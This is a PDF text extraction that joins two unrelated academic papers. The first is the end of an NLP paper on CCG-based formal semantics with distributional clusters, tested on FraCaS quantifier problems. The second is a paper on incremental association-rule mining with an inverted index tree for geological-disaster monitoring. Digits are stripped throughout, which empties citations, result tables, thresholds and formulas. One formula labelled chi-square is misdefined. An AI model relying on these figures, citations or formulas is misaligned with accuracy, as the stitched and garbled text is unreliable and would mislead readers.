evaluating our approach as a model of formal semantics—demonstrating that it is possible to integrate the formal semantics of steedman ( ) with our distributional clusters. the fracas suite (cooper et al., ) contains a hand-built set of entailment problems designed to be challenging in terms of formal semantics. we use section , which contains problems requiring an understanding of quantifiers . they do not re- quire any knowledge of lexical semantics, meaning we can evaluate the formal component of our system in isolation. however, we use the same representa- tions as in our previous experiment, even though the clusters provide no benefit on this task. figure gives an example problem. the only previous work we are aware of on this dataset is by maccartney and manning ( ). this approach learns the monotonicity properties of words from a hand-built training set, and uses this to transform a sentence into a polarity anno- tated string. the system then aims to transform the premise string into a hypothesis. positively polar- ized words can be replaced with less specific ones (e.g. 
by deleting adjuncts), whereas negatively po- larized words can be replaced with more specific ones (e.g. by adding adjuncts). whilst this is high- precision and often useful, this logic is unable to per- form inferences with multiple premise sentences (in contrast to our first-order logic). development consists of adding entries to our lex- icon for quantifiers. for simplicity, we treat multi- word quantifiers like at least a few, as being multi- word expressions—although a more compositional analysis may be possible. following maccartney and manning ( ), we do not use held-out data— each problem is designed to test a different issue, so it is not possible to generalize from one subset of the suite to another. as we are interested in evaluating the semantics, not the parser, we manually supply gold-standard lexical categories for sentences with parser errors (any syntactic mistake causes incorrect semantics). our derivations produce a distribution over logical forms—we license the inference if it holds in any interpretation with non-zero probabil- ity. we use the prover (mccune, ) theorem prover for inference, returning yes if the premise im- plies the hypothesis, no if it implies the negation of the hypothesis, and unknown otherwise. results are shown in table . our system im- we use the version converted to machine readable format by maccartney and manning ( ) excluding problems without a defined solution. question answer sentence what did delta merge with? northwest the freighters came with delta’s acquisition of northwest what spoke with hu jintao? obama obama conveyed his respect for the dalai lama to china’s president hu jintao during their first meeting. . . what arrived in colorado? zazi zazi flew back to colorado. . . what ran for congress? young . . . young was elected to congress in table : example questions correctly answered by ccg-distributional. premises: every european has the right to live in europe. every european is a person. every person who has the right to live in europe can travel freely within europe. hypothesis: every european can travel freely within europe solution: yes figure : example problem from the fracas suite. system single multiple premise premises maccartney&manning % - maccartney&manning % - ccg-dist (parser syntax) % % ccg-dist (gold syntax) % % table : accuracy on section of the fracas suite. problems are divided into those with one premise sen- tence ( ) and those with multiple premises ( ). proves on previous work by making multi-sentence inferences. causes of errors include missing a dis- tinct lexical entry for plural the, only taking existen- tial interpretations of bare plurals, failing to inter- pret mass-noun determiners such as a lot of, and not providing a good semantics for non-monotone de- terminers such as most. we believe these problems will be surmountable with more work. almost all er- rors are due to incorrectly predicting unknown — the system makes just one error on yes or no predictions (with or without gold syntax). this suggests that making first-order logic inferences in applications will not harm precision. we are less robust than maccartney and manning ( ) to syntax errors but, conversely, we are able to attempt more of the problems (i.e. those with multi-sentence premises). other approaches based on distributional semantics seem unable to tackle any of these problems, as they do not represent quantifiers or negation. 
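the yes / no / unknown decision used above can be sketched with an off-the-shelf first-order prover. the example below uses nltk's interface to prover9 as a stand-in for the prover the paper relies on, hand-writes the logical forms for the every european problem in the figure instead of deriving them with the ccg pipeline, and assumes the external prover9 binary is installed.

# three-way entailment decision with a first-order theorem prover.
from nltk.sem import Expression
from nltk.inference import Prover9

read = Expression.fromstring
premises = [
    read(r'all x.(european(x) -> right_to_live_in_europe(x))'),
    read(r'all x.(european(x) -> person(x))'),
    read(r'all x.((person(x) & right_to_live_in_europe(x)) -> travel_freely(x))'),
]
hypothesis = read(r'all x.(european(x) -> travel_freely(x))')
neg_hypothesis = read(r'-(all x.(european(x) -> travel_freely(x)))')

prover = Prover9()
if prover.prove(hypothesis, premises):
    print("yes")                 # premises entail the hypothesis
elif prover.prove(neg_hypothesis, premises):
    print("no")                  # premises entail the negation of the hypothesis
else:
    print("unknown")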
related work much work on semantics has taken place in a su- pervised setting—for example the geoquery (zelle and mooney, ) and atis (dahl et al., ) se- mantic parsing tasks. this approach makes sense for generating queries for a specific database, but means the semantic representations do not generalize to other datasets. there have been several attempts to annotate larger corpora with semantics—such as ontonotes (hovy et al., ) or the groningen meaning bank (basile et al., ). these typically map words onto senses in ontologies such as word- net, verbnet (kipper et al., ) and framenet (baker et al., ). however, limitations of these ontologies mean that they do not support inferences such as x is the author of y → x wrote y. given the difficulty of annotating large amounts of text with semantics, various approaches have at- tempted to learn meaning without annotated text. distant supervision approaches leverage existing knowledge bases, such as freebase (bollacker et al., ), to learn semantics (mintz et al., ; krish- namurthy and mitchell, ). dependency-based compositional semantics (liang et al., ) learns the meaning of questions by using their answers as denotations—but this appears to be specific to ques- tion parsing. such approaches can only learn the pre-specified relations in the knowledge base. the approaches discussed so far in this section have all attempted to map language onto some pre- specified set of relations. various attempts have been made to instead induce relations from text by clustering predicates based on their arguments. for example, yao et al. ( ) propose a series of lda- based models which cluster relations between en- tities based on a variety of lexical, syntactic and semantic features. unsupervised semantic pars- ing (poon and domingos, ) recursively clusters fragments of dependency trees based on their argu- ments. although usp is an elegant model, it is too computationally expensive to run on large corpora. it is also based on frame semantics, so does not clus- ter equivalent predicates with different frames. to our knowledge, our work is the first such approach to be integrated within a linguistic theory supporting formal semantics for logical operators. vector space models represent words by vectors based on co-occurrence counts. recent work has tackled the problem of composing these matrices to build up the semantics of phrases or sentences (mitchell and lapata, ). another strand (co- ecke et al., ; grefenstette et al., ) has shown how to represent meanings as tensors, whose order depends on the syntactic category, allowing an elegant correspondence between syntactic and semantic types. socher et al. ( ) train a com- position function using a neural network—however their method requires annotated data. it is also not obvious how to represent logical relations such as quantification in vector-space models. baroni et al. ( ) make progress towards this by learning a classifier that can recognise entailments such as all dogs =⇒ some dogs, but this remains some way from the power of first-order theorem proving of the kind required by the problem in figure . an alternative strand of research has attempted to build computational models of linguistic theories based on formal compositional semantics, such as the ccg-based boxer (bos, ) and the lfg- based xle (bobrow et al., ). such approaches convert parser output into formal semantic repre- sentations, and have demonstrated some ability to model complex phenomena such as negation. 
for lexical semantics, they typically compile lexical re- sources such as verbnet and wordnet into inference rules—but still achieve only low recall on open- domain tasks, such as rte, mostly due to the low coverage of such resources. garrette et al. ( ) use distributional statistics to determine the proba- bility that a wordnet-derived inference rule is valid in a given context. our approach differs in that we learn inference rules not present in wordnet. our lexical semantics is integrated into the lexicon, rather than being implemented as additional infer- ence rules, meaning that inference is more efficient, as equivalent statements have the same logical form. natural logic (maccartney and manning, ) offers an interesting alternative to symbolic logics, and has been shown to be able to capture complex logical inferences by simply identifying the scope of negation in text. this approach achieves similar pre- cision and much higher recall than boxer on the rte task. their approach also suffers from such limita- tions as only being able to make inferences between two sentences. it is also sensitive to word order, so cannot make inferences such as shakespeare wrote macbeth =⇒ macbeth was written by shakespeare. conclusions and future work this is the first work we are aware of that combines a distributionally induced lexicon with formal seman- tics. experiments suggest our approach compares favourably with existing work in both areas. many potential areas for improvement remain. hierachical clustering would allow us to capture hypernym relations, rather than the synonyms cap- tured by our flat clustering. there is much potential for integrating existing hand-built resources, such as ontonotes and wordnet, to improve the accu- racy of clustering. there are cases where the ex- isting ccgbank grammar does not match the re- quired predicate-argument structure—for example in the case of light verbs. it may be possible to re- bank ccgbank, in a way similar to honnibal et al. ( ), to improve it on this point. acknowledgements we thank christos christodoulopoulos, tejaswini deoskar, mark granroth-wilding, ewan klein, ka- trin erk, johan bos and the anonymous reviewers for their helpful comments, and limin yao for shar- ing code. this work was funded by erc advanced fellowship gramplus and ip ec-fp - xperience. references c.f. baker, c.j. fillmore, and j.b. lowe. . the berkeley framenet project. in proceedings of the th annual meeting of the association for computa- tional linguistics and th international conference on computational linguistics-volume , pages – . association for computational linguistics. m. baroni, r. bernardi, n.q. do, and c. shan. . entailment above the word level in distributional se- mantics. in proceedings of eacl, pages – . cite- seer. v. basile, j. bos, k. evang, and n. venhuizen. . developing a large semantically annotated corpus. in proceedings of the eighth international conference on language resources and evaluation (lrec ). to appear. jonathan berant, ido dagan, and jacob goldberger. . global learning of typed entailment rules. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies - volume , hlt ’ , pages – . association for computational linguistics. c. biemann. . chinese whispers: an efficient graph clustering algorithm and its application to natural lan- guage processing problems. in proceedings of the first workshop on graph based methods for natural language processing, pages – . 
association for computational linguistics. d.m. blei, a.y. ng, and m.i. jordan. . latent dirichlet allocation. the journal of machine learning research, : – . d. g. bobrow, c. condoravdi, r. crouch, v. de paiva, l. karttunen, t. h. king, r. nairn, l. price, and a. zaenen. . precision-focused textual inference. in proceedings of the acl-pascal workshop on tex- tual entailment and paraphrasing, rte ’ , pages – . association for computational linguistics. kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a col- laboratively created graph database for structuring hu- man knowledge. in proceedings of the acm sigmod international conference on management of data, sigmod ’ , pages – , new york, ny, usa. acm. j. bos and k. markert. . recognising textual en- tailment with logical inference. in proceedings of the conference on human language technology and empirical methods in natural language processing, pages – . association for computational lin- guistics. johan bos. . wide-coverage semantic analysis with boxer. in johan bos and rodolfo delmonte, editors, semantics in text processing. step conference proceedings, research in computational semantics, pages – . college publications. p.f. brown, p.v. desouza, r.l. mercer, v.j.d. pietra, and j.c. lai. . class-based n-gram models of natural language. computational linguistics, ( ): – . n. chinchor and p. robinson. . muc- named entity task definition. in proceedings of the th conference on message understanding. stephen clark and james r. curran. . parsing the wsj using ccg and log-linear models. in proceed- ings of the nd annual meeting on association for computational linguistics, acl ’ . association for computational linguistics. bob coecke, mehrnoosh sadrzadeh, and stephen clark. . mathematical foundations for a compositional distributional model of meaning. linguistic analysis: a festschrift for joachim lambek, ( - ): – . robin cooper, dick crouch, jan van eijck, chris fox, johan van genabith, jan jaspars, hans kamp, david milward, manfred pinkal, massimo poesio, et al. . using the framework. fracas deliverable d, . ido dagan, o. glickman, and b. magnini. . the pascal recognising textual entailment challenge. machine learning challenges. evaluating predictive uncertainty, visual object classification, and recog- nising tectual entailment, pages – . d.a. dahl, m. bates, m. brown, w. fisher, k. hunicke- smith, d. pallett, c. pao, a. rudnicky, and e. shriberg. . expanding the scope of the atis task: the atis- corpus. in proceedings of the work- shop on human language technology, pages – . association for computational linguistics. hal daumé iii. . fast search for dirichlet process mixture models. in proceedings of the eleventh in- ternational conference on artificial intelligence and statistics (aistats), san juan, puerto rico. d. davidson. . . the logical form of action sen- tences. essays on actions and events, ( ): – . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information extraction. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – . association for com- putational linguistics. t. fountain and m. lapata. . incremental models of natural language category acquisition. in proceedings of the st annual conference of the cognitive science society. d. garrette, k. erk, and r. mooney. . integrating logical representations with probabilistic information using markov logic. 
in proceedings of the ninth in- ternational conference on computational semantics, pages – . association for computational lin- guistics. d. graff, j. kong, k. chen, and k. maeda. . english gigaword. linguistic data consortium, philadelphia. edward grefenstette, mehrnoosh sadrzadeh, stephen clark, bob coecke, and stephen pulman. . con- crete sentence spaces for compositional distributional models of meaning. computational semantics iwcs , page . julia hockenmaier and mark steedman. . ccg- bank: a corpus of ccg derivations and dependency structures extracted from the penn treebank. compu- tational linguistics, ( ): – . m. honnibal, j.r. curran, and j. bos. . rebanking ccgbank for improved np interpretation. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – . associa- tion for computational linguistics. e. hovy, m. marcus, m. palmer, l. ramshaw, and r. weischedel. . ontonotes: the % solution. in proceedings of the human language technology conference of the naacl, companion volume: short papers, pages – . association for computational linguistics. p. kingsbury and m. palmer. . from treebank to propbank. in proceedings of the rd international conference on language resources and evaluation (lrec- ), pages – . citeseer. k. kipper, h.t. dang, and m. palmer. . class-based construction of a verb lexicon. in proceedings of the national conference on artificial intelligence, pages – . menlo park, ca; cambridge, ma; london; aaai press; mit press; . jayant krishnamurthy and tom m. mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empir- ical methods in natural language processing and computational natural language learning, emnlp- conll ’ , pages – . association for compu- tational linguistics. p. liang, m.i. jordan, and d. klein. . learning dependency-based compositional semantics. in proc. association for computational linguistics (acl). dekang lin and patrick pantel. . dirt - discovery of inference rules from text. in in proceedings of the acm sigkdd conference on knowledge discovery and data mining, pages – . bill maccartney and christopher d. manning. . natural logic for textual inference. in proceedings of the acl-pascal workshop on textual entailment and paraphrasing, rte ’ , pages – . associa- tion for computational linguistics. andrew kachites mccallum. . mal- let: a machine learning for language toolkit. http://mallet.cs.umass.edu. w. mccune. . prover and mace . http://cs.unm.edu/˜mccune/mace /. g.a. miller. . wordnet: a lexical database for en- glish. communications of the acm, ( ): – . m. mintz, s. bills, r. snow, and d. jurafsky. . dis- tant supervision for relation extraction without labeled data. in proceedings of the joint conference of the th annual meeting of the acl and the th interna- tional joint conference on natural language process- ing of the afnlp: volume -volume , pages – . association for computational linguistics. j. mitchell and m. lapata. . vector-based models of semantic composition. proceedings of acl- : hlt, pages – . r.m. neal. . markov chain sampling methods for dirichlet process mixture models. journal of compu- tational and graphical statistics, ( ): – . d.o. o’seaghdha. . latent variable models of se- lectional preference. in proceedings of the th an- nual meeting of the association for computational linguistics, pages – . association for compu- tational linguistics. hoifung poon and pedro domingos. . unsuper- vised semantic parsing. 
in proceedings of the conference on empirical methods in natural language processing: volume - volume , emnlp ' , pages – . association for computational linguistics. hoifung poon and pedro domingos. . unsupervised ontology induction from text. in proceedings of the th annual meeting of the association for computational linguistics, acl ' , pages – . association for computational linguistics. a. ritter, o. etzioni, et al. . a latent dirichlet allocation method for selectional preferences. in proceedings of the th annual meeting of the association for computational linguistics, pages – . association for computational linguistics. stefan schoenmackers, oren etzioni, daniel s. weld, and jesse davis. . learning first-order horn clauses from web text. in proceedings of the conference on empirical methods in natural language processing, emnlp ' , pages – . association for computational linguistics. r. socher, b. huval, c.d. manning, and a.y. ng. . semantic compositionality through recursive matrix-vector spaces. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . association for computational linguistics. mark steedman. . the syntactic process. mit press. mark steedman. . taking scope: the natural semantics of quantifiers. mit press. idan szpektor, eyal shnarch, and ido dagan. . instance-based evaluation of entailment rule acquisition. in proceedings of acl , volume , page . ivan titov and alexandre klementiev. . a bayesian model for unsupervised semantic parsing. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – , portland, oregon, usa, june. association for computational linguistics. limin yao, aria haghighi, sebastian riedel, and andrew mccallum. . structured relation discovery using generative models. in proceedings of the conference on empirical methods in natural language processing, emnlp ' , pages – . association for computational linguistics. limin yao, sebastian riedel, and andrew mccallum. . unsupervised relation discovery with sense disambiguation. in acl ( ), pages – . j.m. zelle and r.j. mooney. . learning to parse database queries using inductive logic programming. in proceedings of the national conference on artificial intelligence, pages – .

a hadoop-based parallel algorithm for incremental updating association mining with an inverted index tree

international conference on sensor network and computer engineering (icsnce )

application of incremental updating association mining algorithm in geological disasters system

wang jianguo, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: wjg_xit@ .com
zhu ying, school of computer science and engineering, xi'an technological university, xi'an, , china, e-mail: @qq.com

abstract—aiming at the problems of low efficiency and high time and space cost, this paper proposes an algorithm to update the association mining of the inverted index tree. the algorithm combines the inverted index technology with the tree structure. when the data in the database is continuously updated, it can scan only the newly added part of the database, without having to scan the original database to count the number of transaction items. the optimal threshold predicted by newton's interpolation formula is compared with these counts to get frequent item sets.
then, the confidence level is calculated for the combinations of different item sets in frequent item sets, and the correlation rules are obtained, and the correlation analysis of the rules is carried out to obtain a more realistic association rule. the inverted index tree updating association mining algorithm was applied to the data analysis of geological hazards monitoring system. one year data record of rainfall, groundwater level, soil water content and topography data was selected as the experimental data set. compared with the iuar algorithm, it is found that the inverted index tree updating association mining algorithm has some improvements in memory consumption and efficiency. the experimental results show that when the minimum support of iuar algorithm remains unchanged, the number of transaction records is the same as the amount of new data, and inverted index tree incremental updating association mining algorithm takes less than / of the iuar algorithm. when the number of transaction records and the amount of new data remain unchanged and iuar algorithm support changes, the inverted index tree incremental updating association mining algorithm memory consumption is much smaller than iuar algorithm. in the process of experiment, according to the results of the inverted index tree incremental updating association mining algorithm, the association rules are obtained and the correlation is judged. the strong association rules are used to set the alarm threshold of the geological disaster monitoring system. keywords-inverted index tree; geological disaster system; frequent item sets; association rules i. introduction geological disasters are geological phenomena that cause serious harm or potential threat to human lives and property. human activities can affect the occurrence of geological disasters and the extent of their damage, but they can not be completely eliminated or prevented. in addition to earthquakes, volcanoes, tsunamis and other sudden geological disasters can cause unmanageable destructive disaster to humans. some slowly changing geological disasters such as landslides, land subsidence and ground fissures will also bring huge losses to the lives and property of the people, the economic development in cities and areas. geological disasters have seriously affected the sustainable development of society and affected social stability. therefore, geological disaster data is an important basic resource related to national economy and the people's livelihood, because the data contains a lot of useful information. but understanding and relying on these data to make scientific international conference on sensor network and computer engineering (icsnce ) decisions is beyond human capacity. how to make full use of geological exploration data to make relevant prediction and scientific decision-making has become one of the concerns of production decision makers. association rule mining[ ] is one of the most explored, most commonly used data mining technology. this method is one of the most active research areas in the field of data mining. it mainly helps to discover the implicit and valuable relationships between data items in massive databases to guide decision makers in various fields such as commerce strategic analysis. researching association rule algorithms in big data technology environment is a very important and challenging research topic. 
considering that the data in the database of geological disasters always change constantly, the incremental association rule updating techniques have been proposed to effectively maintain the association rules of updated data. the technology should have some characteristics:  the association rules should vary with the data;  the rule updating should avoid dealing with the old data again, as much as possible to use the previous processing results;  updating maintenance methods should be applied to a variety of occasions as much as possible. fup algorithm is iterative update algorithm based on apriori algorithm. in order to solve the problem of incremental updating mining of association rules, cheung and other scholars proposed a fast update algorithm (fup)[ ]. later, domestic scholars such as zhu yuquan proposed a method fukfia[ ] for rapidly updating frequent item sets based on the fup algorithm. they define a new set of frequent items that reduce the number of database scans to a certain extent. inevitably, the above incremental updating algorithm of association rules, like the apriori algorithm, requires layer-by-layer traversal to generate frequent item sets. therefore, there is also the problem of overhead in processing databases and generating huge candidate item sets.fup algorithm[ ] is based on the fup algorithm to improve, put forward an improved algorithm for transaction records in the constantly updated, correct and delete operations. feng yucai and other scholars put forward incremental update association mining algorithm iua and piua[ ]. in the algorithm, splicing and pruning techniques are used to solve the generation of candidate item sets. when the transaction database is unchanged and the minimum support threshold is changed. cats-tree algorithm[ ], iuar algorithm[ ] are through a variety of methods to reduce the number of scanning the original database to achieve incremental update association rules maintenance issues. to sum up, the fup algorithm and the fup algorithm are used to maintain the incremental updating association mining when the minimum support threshold and the minimum confidence threshold do not change, and the transaction records are continuously updated. iua algorithm, piua algorithm and cats-tree algorithm handle the maintenance of incremental updating association mining when the transaction record data does not change, the minimum support threshold and the minimum confidence threshold change. the iuar algorithm is used to solve the problem of maintaining and updating the association mining when the transaction database is continuously updated and the minimum support threshold is changed. the basic idea of the algorithm is to obtain the extended set of candidate frequent items by reducing the support degree. when accessing the updated database, the association rules are incrementally updated by constantly updating the candidate frequent item sets. although this algorithm has been greatly optimized in terms of the large number of candidate item sets, there are still some shortcomings that it is necessary to retrieve the original transaction database multiple times and produce a large number of candidate item sets. so far, there has been relatively little research on incremental updates in the context of big data environments when both the transaction database and the minimum support threshold are changed. therefore, it is very necessary to find an incremental update mining method that can effectively solve such problems. 
in this paper, we propose an incremental update mining algorithm for inverted index tree, which is applied to geological disaster monitoring system. firstly, the frequent international conference on sensor network and computer engineering (icsnce ) item sets are excavated according to the database, and then the association rules are obtained and analyzed. finally, the association rules are applied to the early warning work. ii. inverted index and inverted index tree a. inverted index the inverted index is the most commonly used data structure in the information retrieval system. in the index, each index item consists of the attribute value and the location information that appears,<key, storage address>. at the time of querying, you can get all the documents that contain the keyword at once, so the retrieval efficiency is higher than the forward index. for example, table is a partial transaction log of the groundwater table (derived from the original transaction database of the geological disaster monitoring system), and figure is the inverted index map (iip)[ ] of table i. table i. groundwater table in geological disasters database (mm) id groundwater level figure . table.i corresponds to the inverted index map(iip) b. inverted index tree based on b+ tree implementation b+ tree is the deformation of the b-tree. a m-order b+ tree[ ] should meet the following characteristics:  the number of keywords per node is equal to the number of children. the keywords of all non-lowest inner nodes are the largest keywords on the corresponding sub-tree, and the bottom node contains all the keywords;  branch nodes can be placed (m- ) keyword, leaf nodes can put m keywords;  all leaf nodes are in the same layer of the number structure and do not contain any information. thus, the tree height of the tree is balanced. b+ tree is a commonly used index mechanism in the database and a one-dimensional data index structure design[ ]. as shown in figure , a b+ tree consisting of the divided character string is m= . figure . order three of the b+ tree international conference on sensor network and computer engineering (icsnce ) iii. algorithm of incremental updating rule mining for inverted index tree the above traditional frequent item sets mining algorithm has disadvantages when generating association rules mining will generate a large number of candidate item sets and repeat retrieval processing of the original database. in this paper, we implement the inverted index tree based on the characteristics of b+ tree and put forward the incremental update association mining algorithm of inverted index tree to deal with the association rules efficiently. a. basic ideas  statistics in the database transaction items, get transaction items set.  constructs the inverted index tree (iitree) based on the b+ tree creation method. the bottom-most leaf node of iitree contains all the item sets. the frequent item sets are obtained by comparing the number of items with the minimum support, and other infrequent item sets remain in their leaf nodes to ensure that future data updating become frequent nodes. the different item sets in the frequent item sets are combined and their confidences are calculated. when the confidence is greater than the minimum confidence, the item set combination is the association rule. compared with the previous incremental updating correlation mining algorithm, inverted index tree incremental updating association mining algorithm introduces b+ tree structure, as well as the database settings. 
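as a small illustration of the inverted index map of section ii and of the counting used in the basic ideas above, the sketch below maps each attribute value to the list of record ids in which it occurs (a <key, storage address> posting list); the length of a posting list is the occurrence count that is later compared against the minimum support. the groundwater-level values are invented, since the numeric entries of table i are not reproduced here.

# build an inverted index map (value -> posting list of record ids) and derive counts.
from collections import defaultdict

def build_iip(records):
    """records: iterable of (record_id, value) pairs."""
    index = defaultdict(list)
    for record_id, value in records:
        index[value].append(record_id)     # posting list for this attribute value
    return index

groundwater = [(1, 520), (2, 540), (3, 520), (4, 560), (5, 520)]   # invented sample
iip = build_iip(groundwater)
counts = {value: len(ids) for value, ids in iip.items()}           # occurrences per value
print(dict(iip))
print(counts)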
when adding new data, we only need to retrieve the frequent item sets that deal with the new part of the data without the need to re-retrieve the entire database. the algorithm takes advantage of the b+ tree's balanced tree properties. the leaf nodes at the bottom of the tree contain all the keywords of the whole tree, and they are linked together like a doubly linked list. the inverted index[ ] is realized based on the b+ tree . b. set the threshold the minimum support threshold and the minimum confidence threshold will change with different user needs and database updates. when the threshold is set too low, the more rules that are excavated, the lower the usefulness of the rules. conversely, when the threshold is set too high, there are few rules for mining, so some useful rules will be lost. therefore, setting the appropriate threshold is very important when dealing with incremental databases.  when mining association rules for the first time, setting the minimum support threshold is a trial and error. select a small part of data sets randomly from the entire database to be excavated, set initial support thresholds and confidence thresholds according to the user's requirements or experience, and obtain n number of association rules. compare n with the number of association rules the user expects m. if dnn  ' / , it is considered that the threshold set by the user is smaller, so that the excess number of rules dug up is expected. we should increase the support threshold by a certain value and rerun it. if dnnb  ' / ,it is considered that the user is substantially satisfied with the result of the association rule mined at this support threshold. if bnn  ' / ,it is considered that the set threshold is too large, some important rules may be lost, and then a slightly smaller support threshold is selected to re-excavate the algorithm.  when the transaction database is updated, it is possible that the previously set threshold is no longer applicable, so the threshold needs to be reset. based on the support threshold, confidence threshold, the number of association rules output by the algorithm at the last time and the current mining targets, the newton interpolation formula is used to predict the support threshold that should be adopted currently, which makes the mining association rules more effective . international conference on sensor network and computer engineering (icsnce ) c. algorithm implementation in order to achieve the inverted index[ ] with the b+ tree, inverted index tree incremental update association mining algorithm is proposed. ) the algorithm steps are briefly described as follows: a) traverse the inverted index map, get the item set. based on the data of groundwater level, soil moisture content, rainfall and topography in the database of geological disaster monitoring system, inverted index maps were established. traversing the index graph to get the item set, and then by the b+ tree to build inverted index tree. b) get all frequent item sets based on the generated iitree. in the b+ tree, the bottom leaf node contains all the keywords. then, the confidence level is calculated for the combinations of different item sets in frequent item sets, and the correlation rules are obtained, and the correlation analysis of the rules is carried out to obtain a more realistic association rule. c) when the transaction database update records, in accordance with the above steps to retrieve some of the new data processing, the item set inserted iitree. 
add a keyword to the leaf node at the bottom of the iitree. if the number of keywords contained in the node does not exceed m, the insertion is successful. otherwise, the node needs to be split. the number of keywords included in the two new nodes after splitting should not be less than (m/ + ). if the parent node has enough space (m/ ~ m- ), the parent node should contain the smallest keyword in the right node. otherwise, the parent node is split and a new keyword is added to the parent of the parent node, and so on at higher levels until a new root node is generated ( ~ m- ). d) after the database is updated, repeat the above steps and then generate the association rules.

the incremental update is illustrated with groundwater level data: table ii lists the newly added records, and figure shows the inverted index tree corresponding to the updated database. table ii. update the record data (mm), with columns id and groundwater level. figure . inverted index tree of updated data. ) the algorithm flow chart is shown in figure : figure . flow chart of the incremental updating association mining algorithm of the inverted index tree.

d. correlation analysis of association rules

association rules have measures of interest such as support and confidence. however, association rules may include causal association as well as random association or even negative correlation. here is an example to illustrate: in a supermarket database system, the customers' purchase information is recorded. of the purchases, of them included bread, had biscuits, and had both bread and biscuits. if you set a minimum support of % and a minimum confidence of %, then you can get the following association rule: rule : buy bread ⇒ buy biscuits {support = %, confidence = %}. in reality, buying bread and buying biscuits may be negatively correlated, because buying bread will reduce the number of people buying biscuits. at the same time, consider the following negative correlation rule: rule : buy bread ⇒ do not buy biscuits {support = %, confidence = %}. in a sense, the second rule is more realistic. thus, under the given threshold conditions, two contradictory rules are obtained. it can be seen from the above example that judging the true meaning of association rules cannot be based solely on the measures of support and confidence, but rather requires a comprehensive examination of the data set. to do this, other methods such as chi-square statistics or correlation analysis[ ] have been put forward. the core idea of these methods is to measure the correlation between data items. the chi-square statistic is calculated as follows:

χ²(a,b) = [p(a∪b) − p(a) × p(b)] / (p(a) × p(b))   ( )

if the chi-square statistic is zero, then there is no dependency between data item a and data item b, and they are independent of each other. otherwise, the data items are interdependent. correlation calculations show more clearly whether this dependence is mutual promotion or mutual restraint. the correlation is calculated as follows:

corr(a,b) = p(a∪b) / (p(a) × p(b))   ( )

if corr(a,b) is equal to 1, then data item a and data item b are independent; if corr(a,b) is greater than 1, data item a and data item b are positively correlated; if corr(a,b) is less than 1, then data item a and data item b are negatively correlated. the support-confidence framework is not perfect: some rules are of no practical value, even if both support and confidence are high. the association rule a ⇒ b does not tell the user whether a and b are constructive or counterproductive.
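the measures just defined can be illustrated with a short sketch that computes support, confidence and the correlation of equation ( ) directly from transactions; the toy baskets are invented, and a correlation above (below) 1 indicates positive (negative) correlation, as described above.

# support, confidence and correlation of an association rule a => b from raw transactions.
def measures(transactions, a, b):
    n = float(len(transactions))
    p_a = sum(a <= t for t in transactions) / n         # subset test: a occurs in t
    p_b = sum(b <= t for t in transactions) / n
    p_ab = sum((a | b) <= t for t in transactions) / n   # a and b occur together
    support = p_ab
    confidence = p_ab / p_a if p_a else 0.0
    corr = p_ab / (p_a * p_b) if p_a * p_b else 0.0
    return support, confidence, corr

baskets = [{"bread", "biscuits"}, {"bread"}, {"bread", "milk"}, {"biscuits"},
           {"bread", "biscuits", "milk"}, {"milk"}]
print(measures(baskets, {"bread"}, {"biscuits"}))   # rule: buy bread => buy biscuits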
relevance analysis of association rules is to overcome this deficiency, allowing users to rationally view the association rules. therefore, after the association rules of the geological disaster monitoring system database are excavated, the correlation analysis should be carried out to ensure the practicability of this rule. if it is determined that the rule is positively correlated, the value of the rule is used as the alarm threshold of the geological hazard monitoring system. in the future of new data acquisition, if the conditions of this rule, then the alarm. people can prevent it in advance. iv. experiment results and analysis the algorithm uses the record of rainfall, groundwater level, soil water content and topography data of shang nan county in shang luo city in the geological disaster monitoring system of last year as the experimental data set. use c language in win , dual-core . ghz cpu, gb memory on the pc for simulation. a. comparison of iitree algorithm and iuar algorithm ) the analysis of time complexity of the algorithm: a) when the data is updated, only in the database to scan the updated data; b) when building an inverted index tree, scan the tree structure once and insert the new item set. analysis shows that )(*)( )]()(*)([ ),( bpap bapbpap ba u  international conference on sensor network and computer engineering (icsnce ) when the minimum support is constant, the execution time of the algorithm is related to the amount of data updated each time. to extract a small number of experimental samples from the data set, the minimum support for controlling iuar algorithm is unchanged ( . ), increase the amount of updated data in turn. record the experiment time of iuar algorithm and iitree algorithm respectively, time comparison shown in figure : table iii. iuar, iitree algorithm to run the experimental time(s) data set time twenty thousand <no new ones> iuar iitree forty thousand <add , > iuar iitree eighty thousand <add , > iuar iitree one hundred thousand <add , > iuar iitree figure . algorithms time comparison for iuar and iitree as shown in figure , when the minimum support is constant, the execution time of the iuar algorithm increases rapidly but the ones of the iitree algorithm grows more slowly when the amount of updated data increases. in the same amount of data, iuar algorithm takes more time than iitree. ) the analysis of spatial complexity of the algorithm: a) in the inverted index map, only the updated data is stored, so the size of the memory space is related to the amount of updated data; b) in the iitree algorithm, the frequent item sets determined by the minimum support are stored, so the memory space is associated with the minimum support. this experiment mainly studies the effect of minimum support on memory usage. when the minimum support of iuar algorithm is changed from . to . , the data samples and increments remain unchanged. new records have been added to the raw groundwater level data set as test samples. the memory usage of iuar algorithm and iitree algorithm is compared according to the experimental results. figure . memory usage comparison figure shows that the smaller the minimum support, the more the number of item sets produced, the greater the memory footprint. in the case of support change, the iuar algorithm updates the candidate set with the change of the support degree, saves the candidate item set and the frequent item set in the memory space. 
the iitree algorithm does not generate the candidate item set in the change of the support degree, so the occupied memory space by iuar algorithm is greater than the ones by iitree algorithm. b. application of iitree algorithm in geological disaster monitoring system if the relationship between the table properties are boolean attributes, then mining rules from this relational table are boolean rules. the problem now is that geological disaster monitoring system databases are numerical data. the quantitative attributes must be dealt with in a necessary way so international conference on sensor network and computer engineering (icsnce ) that the mining of quantitative rules can be transformed into the mining of boolean rules. the main strategy is to divide the range of the number attribute into intervals, and to decompose a quantity attribute into several boolean attributes. in order to reduce the computational workload, the original data are standardized and divided into different sections. the data are grouped according to the sections and the frequency is recorded in the iitree. then the frequent item sets can be excavated. the frequent item sets are divided according to the average value and divided into low value area and high value area respectively. data of groundwater level, rainfall, soil moisture content and ground deformation in the past year were selected from the database of geological disasters and the association rules were excavated. select some of the data for analysis, as shown in table iv: table iv. disaster monitoring data to boolean data conversion table nu m 